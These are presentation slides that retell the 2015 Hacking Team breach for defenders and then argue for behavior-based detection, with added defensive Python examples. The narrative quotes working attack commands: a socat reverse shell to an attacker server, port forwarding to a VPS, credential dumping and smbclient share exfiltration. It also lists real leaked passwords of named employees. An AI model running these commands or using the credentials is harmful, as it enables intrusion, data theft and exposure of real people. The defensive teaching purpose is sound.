Hacking the Hacking Team (SANS presentation)

Richard Harlan

Senior Sales Engineer @ Cybereason

© 2015 Cybereason Inc. All rights reserved.

Cybereason at a Glance

Founded by veteran cyber security experts

• Members of Elite Military Cybersecurity Unit

• Hacking Operations & Forensics

• Reverse engineering & Malware analysis

• Cryptography & Evasion

• Machine learning, big data analytics and visualization technology experts

• Artificial Intelligence: High speed intelligent event querying

• Proven: successful deployments with the largest enterprises, including a 120,000-endpoint customer

Experienced data security scientists


A Model to Study

Fully Documented Adversary – Nation State Grade & Lone Operator

Learn complete TTPs

Setting expectations

Let’s make some Cyber-Defenders Cry


Nice Guy?

Hacking Team CEO David Vincenzetti joked with company employees about what would happen if someone leaked information:

"Imagine this: a leak on WikiLeaks showing YOU explaining the evilest technology on earth! :-). You would be demonized by our dearest friends the activists, and normal people would point their fingers at you."


Hacking Team Process

A customer (a nation state or a company) would provide HT with a list of targets and the data they wished to collect.

The attack would start in one of several ways.

Method 1

HT would get the target to click on a link (delivered by spear-phishing or a watering-hole site).

The HT server checked whether the visitor was a valid target.

If the visitor was not a valid target, they received a 404 error page or a news page (customer's choice!).

If the visitor was a valid target, the HT server profiled the machine (OS and browser), HT used the Adobe exploit appropriate for that target and escalated privileges to NT AUTHORITY\SYSTEM, and then it installed the RCS agent and loaded whatever modules were needed to collect the requested data.


Hacking Team Process: Method 2

HT would install a network injector, a tool plugged into an upstream or ISP backbone. The injector identified targets based on customer-defined rules. It waited until the victim visited a particular website (youtube.com, etc.) and redirected them to HT's infection server. The victim received a handy message:

HT sometimes used a binary melter in conjunction with the injector: when the victim downloaded a file, the RCS agent would be "melted" into the benign binary.

To ensure persistence they used a UEFI BIOS rootkit to keep the RCS agent on the victim's machine.

Even if the user formatted the hard disk, reinstalled the OS, or even bought a new hard disk, the agent remained.


The Hackers are Hacked

Hacking Team's data was exfiltrated in early July 2015.

Twitter profile defaced to read "Hacked Team".

Hacking Team's Twitter account (@hackingteam) was hijacked and posted links to a 400+ GB torrent file on July 5, 2015.


Inside the Torrent File

All of the Exchange server data

All of the RCS installers + manuals + source code

Important and private documents

Screenshots from employees' machines

Entire GIT repository

Pirated software and pirated versions of operating systems

3 full server images (Windows Attack server, Android attack server, and the helpdesk support server)


Who did it?

http://pastebin.com/raw/GPSHF04A


His thought process

Didn’t want to use existing tools and infrastructure

"You often see in the news that an attack has been attributed to a group of governmental hackers (the 'APTs'), because they always use the same tools, leave the same fingerprints, and even use the same infrastructure (domains, mail, etc.). They are negligent because they can hack without legal consequences."

"I used new servers and domains, registered with new email accounts and paid for with new bitcoin addresses. In addition, I only used public tools and things that I wrote especially for this attack, and changed the way I do some things so as not to leave my usual forensic footprint."


Recon - Tools

Very tedious, but a very important stage

"the larger the attack surface, the easier it will be to find a fault…"

Google – you can find some surprising things

Domain enumeration – sometimes you can find "hidden" subdomains

Port scanning – "The company's IDS can generate an alert on port scans, but you do not have to worry, because the entire internet is constantly being scanned."

Fingerprinting (Nmap) – discover what services are being used

LinkedIn

data.com

metagoofil – metadata in published documents


Exploitation

Spear Phishing

"I did not want to try spear phishing against Hacking Team, because their business is to help governments spear-phish their opponents. Therefore there was a much higher risk that Hacking Team would recognize and investigate the attempt."

Buy Access

Thanks to hardworking Russians and their exploit kits, traffic resellers, and bot herders, many companies already have compromised computers within their networks.

"Almost all Fortune 500 companies, with their huge networks, already have bots inside. However, Hacking Team is a very small company, and most of its employees are computer security experts, so there was little chance that they were already compromised."


Exploitation - HT

Hacking Team has a range of public IPs:
inetnum: 93.62.139.32 - 93.62.139.47
descr: HT public subnet

What was found:
• Main website (a Joomla blog in which Joomscan reveals no serious flaw)
• A postfix server
• A pair of routers – embedded systems
• Two VPN devices – embedded systems

He had three options:
• find a 0day in Joomla
• find a 0day in postfix
• find a 0day in one of the embedded systems

"A 0day in an embedded system seemed the most attainable option, and after two weeks of reverse engineering work, I got a remote root exploit. Given that the vulnerabilities have not yet been patched, I will not give more details."


Post-Exploitation / C2 / Persistence

I wrote a backdoored firmware and compiled several post-exploitation tools for the embedded system. The backdoor serves to protect the exploit. Use the exploit only once and then return via the backdoor…

1) busybox
2) Nmap
3) Responder.py – the most useful tool for attacking Windows networks when you have access to the internal network but do not have a domain user.
4) Python
5) tcpdump
6) dsniff
7) socat

For a comfortable shell with a pty:
my_server: socat file:`tty`,raw,echo=0 tcp-listen:my_port
hacked system: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:my_server:my_port

And for many other things; it is the Swiss Army knife of networking.

8) screen – like the socat pty, not strictly necessary, but I wanted to feel at home in Hacking Team's network.

9) a SOCKS proxy server – to use with proxychains to access the internal network with any other program.


Exploitation Successful!! In the network…

Nmap + Responder.py - taking a look around

Internal mapping finds a NoSQL MongoDB!

Internal Hacking Team:

27017/tcp open MongoDB MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 47547
|   totalSize = 49856643072
...
|_  Version = 2.6.5

27017/tcp open MongoDB MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 31987
|   totalSize = 33540800512
|   DATABASES
...
|_  Version = 2.6.5

It contained audio recordings and RCS test instances.


Found the NAS w/ iSCSI

Nmap finds some iSCSI in the 192.168.1.200/24 subnet:

Nmap scan report for ht-synology.hackingteam.local (192.168.200.66)
...
3260/tcp open iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:ht-synology.name
|     Address: 192.168.200.66:3260,0
|_    Authentication: No authentication required

Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)
...
3260/tcp open iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:synology-backup.name
|     Address: 10.0.1.72:3260,0
|     Address: 192.168.200.72:3260,0
|_    Authentication: No authentication required
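The "No authentication required" line in the scan above is the finding a defender should be hunting for on their own storage network. The following is an added example, not code from the talk or from the writeup it quotes: it parses the plain-text output of Nmap's iscsi-info script (the same layout as the scan results shown above) and lists every iSCSI target that can be logged into without CHAP. The hostnames, addresses and target names in the embedded sample are constructed for the example.

```python
"""Flag iSCSI targets that Nmap's iscsi-info script reports as unauthenticated.

Added example (not from the talk or from the Hacking Team writeup): parses the
plain-text output of `nmap -sV --script iscsi-info -p 3260 <range>` and returns
one record per target, so that targets exposed without CHAP can be listed.
The sample output below is constructed; it mirrors the format of the scan
results quoted in the talk.
"""
import re

SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for nas-a.example.local (192.0.2.66)
Host is up (0.0012s latency).
PORT     STATE SERVICE
3260/tcp open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:nas-a.name
|     Address: 192.0.2.66:3260,0
|_    Authentication: No authentication required

Nmap scan report for nas-b.example.local (192.0.2.72)
Host is up (0.0010s latency).
PORT     STATE SERVICE
3260/tcp open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:nas-b.name
|     Address: 10.0.1.72:3260,0
|     Address: 192.0.2.72:3260,0
|     Authentication: required
|   Target: iqn.2000-01.com.synology:nas-b.scratch
|     Address: 192.0.2.72:3260,0
|_    Authentication: No authentication required
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)(?: \((\S+)\))?")
TARGET_RE = re.compile(r"^\|\s+Target:\s*(\S+)")
ADDR_RE = re.compile(r"^\|\s+Address:\s*(\S+)")
AUTH_RE = re.compile(r"^\|_?\s+Authentication:\s*(.+)$")


def parse_iscsi_targets(nmap_text):
    """Return a list of dicts: host, ip, target IQN, addresses, auth string."""
    findings = []
    host = ip = None
    current = None
    for line in nmap_text.splitlines():
        m = HOST_RE.match(line)
        if m:
            # A new host block; the IP is optional in nmap's header line.
            host, ip = m.group(1), m.group(2) or m.group(1)
            current = None
            continue
        m = TARGET_RE.match(line)
        if m:
            current = {"host": host, "ip": ip, "target": m.group(1),
                       "addresses": [], "auth": None}
            findings.append(current)
            continue
        if current is None:
            continue
        m = ADDR_RE.match(line)
        if m:
            current["addresses"].append(m.group(1))
            continue
        m = AUTH_RE.match(line)
        if m:
            current["auth"] = m.group(1).strip()
    return findings


def unauthenticated_targets(nmap_text):
    """iSCSI targets anyone on the network can log in to (no CHAP configured)."""
    return [t for t in parse_iscsi_targets(nmap_text)
            if t["auth"] and t["auth"].lower().startswith("no authentication")]


if __name__ == "__main__":
    for t in unauthenticated_targets(SAMPLE_NMAP_OUTPUT):
        print(f"{t['host']} ({t['ip']}): {t['target']} exposed without CHAP "
              f"on {', '.join(t['addresses'])}")
```

Run it against the saved output of your own scan of the storage VLAN; every record it returns is a LUN that any host with a route to port 3260 can attach, which is exactly what made the backup NAS in this story mountable from an appliance.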


Mount the NAS!

iSCSI requires a kernel module, and compiling it would have been difficult for the embedded system. I forwarded the port so I could mount from a VPS:

VPS: tgcd -L -p 3260 -q 42838
Embedded system: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838

VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1

Now the iSCSI target name iqn.2000-01.com.synology is found, but there are problems mounting it because it believes its address is 192.168.200.72 instead of 127.0.0.1.

The way I solved it was:
iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1

And now, after:
iscsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login

... the device file appears! We mount it:
vmfs-fuse -o ro /dev/sdb1 /mnt/tmp


Backups!!

We find backups of multiple virtual machines.

The Exchange server seems the most interesting. It is too large to download, but we can mount it remotely and look for interesting files:

$ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
$ fdisk -l /dev/loop0
/dev/loop0p1 2048 1258287103 629142528 7 HPFS/NTFS/exFAT

so the offset is 2048 * 512 = 1048576

$ losetup -o 1048576 /dev/loop1 /dev/loop0
$ mount -o ro /dev/loop1 /mnt/exchange/

now in /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311

we find the virtual machine's hard drive, and mount it:

vdfuse -r -t VHD -f f0f78089-D28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/
mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1

... and finally we have all the files of the old Exchange server in /mnt/part1
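The same losetup-offset technique is what an incident responder uses to examine a backup image without ever writing to it. The following is an added example, not code from the talk or the writeup: it parses an `fdisk -l` listing like the one above, honours the sector size fdisk reports (it is not always 512), and produces read-only losetup and mount commands for review rather than running them. The disk listing embedded below is constructed for the example.

```python
"""Compute byte offsets for mounting partitions inside a raw (flat) disk image.

Added example (not from the talk or the writeup it quotes). The writeup runs
`fdisk -l` on a loop device and multiplies the partition's start sector by 512
by hand. This helper parses the `fdisk -l` listing instead, uses the reported
sector size, and emits read-only losetup/mount commands for an analyst to
review before running. The listing below is constructed for the example.
"""
import re

SAMPLE_FDISK = """\
Disk /dev/loop0: 600 GiB, 644245094400 bytes, 1258291200 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
Disklabel type: dos

Device       Boot Start        End    Sectors  Size Id Type
/dev/loop0p1 *     2048 1258287103 1258285056  600G  7 HPFS/NTFS/exFAT
"""

UNITS_RE = re.compile(r"^Units: sectors of \d+ \* (\d+) = (\d+) bytes")
ROW_RE = re.compile(
    r"^(?P<dev>/dev/\S+)\s+(?P<boot>\*?)\s*(?P<start>\d+)\s+(?P<end>\d+)\s+"
    r"(?P<sectors>\d+)\s+(?P<size>\S+)\s+(?P<id>[0-9a-fA-F]+)\s+(?P<type>.+)$")


def parse_fdisk(listing):
    """Return (sector_size, [partition dicts]) from `fdisk -l` text."""
    sector_size = 512  # fdisk's default; overridden by the Units line if present
    parts = []
    for line in listing.splitlines():
        m = UNITS_RE.match(line)
        if m:
            sector_size = int(m.group(2))
            continue
        m = ROW_RE.match(line)
        if m:
            start = int(m.group("start"))
            parts.append({
                "device": m.group("dev"),
                "bootable": m.group("boot") == "*",
                "start_sector": start,
                "end_sector": int(m.group("end")),
                "type": m.group("type").strip(),
                "offset_bytes": start * sector_size,
                "size_bytes": int(m.group("sectors")) * sector_size,
            })
    return sector_size, parts


def mount_plan(listing, image_loop, target_loop, mountpoint):
    """Read-only losetup/mount commands for the first partition of the image."""
    _, parts = parse_fdisk(listing)
    if not parts:
        raise ValueError("no partitions found in fdisk listing")
    p = parts[0]
    return [
        # -r makes the loop device read-only; -o is the byte offset; --sizelimit
        # keeps the device inside the partition so nothing touches its neighbours.
        f"losetup -r -o {p['offset_bytes']} --sizelimit {p['size_bytes']} "
        f"{target_loop} {image_loop}",
        f"mount -o ro,noexec,nodev {target_loop} {mountpoint}",
    ]


if __name__ == "__main__":
    for cmd in mount_plan(SAMPLE_FDISK, "/dev/loop0", "/dev/loop1", "/mnt/exchange"):
        print(cmd)
```

For evidence handling, mount the image itself read-only as well (`losetup -r` on the first loop device) so that neither loop device can alter the backup being examined.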


Local Admin Password!

What interests me most about the backup is to see whether it has a password hash I can use to access the current server.

I use pwdump, cachedump, and lsadump with the registry files. lsadump gives the password for the besadmin service account:

_SC_BlackBerry MDS Connection Service
0000  16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0010  62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00  b.e.s.3.2.6.7.8.
0020  21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00  !.!.!...........

I use proxychains with the SOCKS server on the embedded system and smbclient to check the password:
proxychains smbclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!'

It works! The besadmin password is still valid, and it is a local administrator.

I use my proxy and metasploit's psexec_psh for a meterpreter session. Then I migrate to a 64-bit process, "load kiwi", "creds_wdigest", and I have many passwords, including the domain Administrator's.


Jackpot!!!

HACKINGTEAM BESAdmin bes32678!!!
HACKINGTEAM Administrator uu8dd8ndd12!
HACKINGTEAM c.pozzi P4ssword <---- sysadmin
HACKINGTEAM m.romeo ioLK/(90
HACKINGTEAM l.guerra 4luc@=.=
HACKINGTEAM d.martinez W4tudul3sp
HACKINGTEAM g.russo GCBr0s0705!
HACKINGTEAM a.scarafile Cd4432996111
HACKINGTEAM r.viscardi Ht2015!
HACKINGTEAM a.mino A!e$$andra
HACKINGTEAM m.bettini Ettore&Bella0314
HACKINGTEAM m.luppi Blackou7
HACKINGTEAM s.gallucci 1S9i8m4o!
HACKINGTEAM d.milan set!Dob66
HACKINGTEAM w.furlan Blu3.B3rry!
HACKINGTEAM d.romualdi Rd13136f@#
HACKINGTEAM l.invernizzi L0r3nz0123!
HACKINGTEAM e.ciceri 2O2571&2E
HACKINGTEAM e.rabe erab@4HT!


Data Exfiltration

Now that I'm a domain administrator, I also began to download shares using my proxy and smbclient's -Tc option, for example:

proxychains smbclient '//192.168.1.230/FAE DiskStation' -U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*'

In this way I downloaded the Amministrazione, FAE DiskStation, and FileServer folders.


Lateral Movement

Running tools remotely requires the password or hash of a local admin on the target: mimikatz & sekurlsa

For privilege escalation: PowerUp and bypassuac

Moving around Windows networks:
psexec / psexec_psh / invoke_psexec of PowerShell Empire
WMI / invoke_wmi of PowerShell Empire
PSRemoting
Scheduled Tasks / schtasks

With a domain administrator account, you can download all the file names on the network with PowerView:

Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ | select-string '^(.*) \t' | % { dir -recurse $_.Matches[0].Groups[1] | select fullname | out-file -append files.txt }


Hunting Sysadmins

“One of my favorite pastimes is hunting the sysadmins.”

With a simple combination of Get-Keystrokes and Get-TimedScreenshot from PowerSploit, Do-Exfiltration from Nishang, and GPO, you can spy on any employee, or even the entire domain.

He knew the sysadmins would have access to the source code server.

With the domain admin password he got easy access to the sysadmins' computers and found the location of, and credentials for, the source code.


In Closing…

"It is done. It is so easy to tear down a company and stop their human rights abuses."

"That is the beauty and the asymmetry of hacking: with only a hundred hours of work, one person can undo years of work by a multimillion-dollar company."


TTPs — Love your Enemy!!


MITRE ATT&CK


TTP vs Indicator Example: Thunderstruck

• Let's create a simple indicator for the song Thunderstruck:
  1. There is a group of 3 or more
  2. 1 playing lead guitar
  3. 1 playing bass guitar
  4. 1 playing drums
  5. There might or might not be a lead singer
  6. There might or might not be an Australian in a school uniform

• Now let's take the rule and run it against the following attack.


Thunderstruck – 2Cellos


Did the Rule work?

As you can see, the indicators changed, but the TTP (behavior) was the same. Indicators are fluid; behaviors are hard to change.
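Applied to the lateral-movement techniques the talk lists earlier (psexec / psexec_psh, WMI, PSRemoting, schtasks), the Thunderstruck point looks like this in code. The following is an added example, not code from the talk or from Cybereason: a static indicator that only knows the PsExec file names is run side by side with rules that describe the parent/child process behavior each remote-execution technique produces, over constructed process-creation events of the kind Sysmon Event ID 1 or an EDR records. The file paths, hostnames and command lines in the events are made up; the rule logic uses only well-known Windows process relationships.

```python
"""Behavior (TTP) rules versus a name-based indicator for Windows lateral movement.

Added example (not from the talk): applies "detect the behavior, not the
indicator" to the lateral-movement techniques the talk lists (psexec /
psexec_psh, WMI, PSRemoting, schtasks). Each event is a constructed
process-creation record (parent image, child image, command line); the paths,
hostnames and command lines are made up for the example.
"""
import ntpath

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
          "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# Constructed events: five lateral-movement techniques (1-5) and two benign controls (6-7).
EVENTS = [
    {"id": 1, "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\PSEXESVC.exe", "cmdline": r"C:\Windows\PSEXESVC.exe"},
    {"id": 2, "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -noni -enc JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAA"},
    {"id": 3, "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c copy \\10.0.0.9\share\u.exe C:\Windows\Temp\u.exe"},
    {"id": 4, "parent": r"C:\Windows\System32\wsmprovhost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -Version 5.1 -s -NoLogo -NoProfile"},
    {"id": 5, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /s FILESRV01 /tn Updater /tr "C:\Windows\Temp\u.exe" /sc once /st 23:59 /ru SYSTEM'},
    {"id": 6, "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs -p"},
    {"id": 7, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt"},
]

INDICATOR_NAMES = {"psexec.exe", "psexec64.exe", "psexesvc.exe"}


def base(path):
    return ntpath.basename(path).lower()


def indicator_match(ev):
    """Static indicator: flag only the well-known PsExec file names."""
    return base(ev["image"]) in INDICATOR_NAMES


def behavior_match(ev):
    """Return the technique name if the parent/child relationship is one a
    remote-execution tool produces, whatever the tool or binary is called."""
    parent, child = base(ev["parent"]), base(ev["image"])
    child_dir = ntpath.dirname(ev["image"]).lower()
    cmd = ev["cmdline"].lower()
    # Service-based execution (psexec, psexec_psh, Invoke-PsExec): the Service
    # Control Manager starts a shell, or a binary dropped into the ADMIN$ root.
    if parent == "services.exe" and (child in SHELLS or child_dir == r"c:\windows"):
        return "remote service execution"
    # WMI process creation (wmic /node, Invoke-WmiMethod): WmiPrvSE spawns a shell.
    if parent == "wmiprvse.exe" and child in SHELLS:
        return "WMI remote execution"
    # PowerShell Remoting: anything under wsmprovhost.exe arrived over WinRM.
    if parent == "wsmprovhost.exe":
        return "PSRemoting"
    # Scheduled task created on another host (/s) to run a command (/tr).
    if child == "schtasks.exe" and "/create" in cmd and "/s " in cmd and "/tr" in cmd:
        return "remote scheduled task"
    return None


def evaluate(events):
    """Compare the two approaches; returns {event id: (indicator_hit, technique)}."""
    return {ev["id"]: (indicator_match(ev), behavior_match(ev)) for ev in events}


if __name__ == "__main__":
    for eid, (ioc, ttp) in evaluate(EVENTS).items():
        print(f"event {eid}: indicator={('HIT' if ioc else '-'):4} behavior={ttp or '-'}")
```

On these events the file-name indicator catches only the stock PSEXESVC.exe (event 1) and misses the Metasploit psexec_psh service, WMI, WinRM and the remote task, while the behavior rules catch all five and leave the two benign events alone. Renaming the binary or switching from psexec to Empire changes the indicator; it does not change which Windows process ends up spawning the shell.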


What it Means

[Chart: Damage over Time (Sec., Min., Hrs., Days, Weeks, Months), with the phases Penetration, Recon, Spread, C&C, Damage, Hacking operation and Breach detected marked along the timeline]

Increase focus on actively hunting your adversary at the endpoint

Static IOCs are important but not enough – detect attackers by their behavior


Cybereason Research Paper

www.cybereason.com, under Resources > Research


Thank you.

www.cybereason.com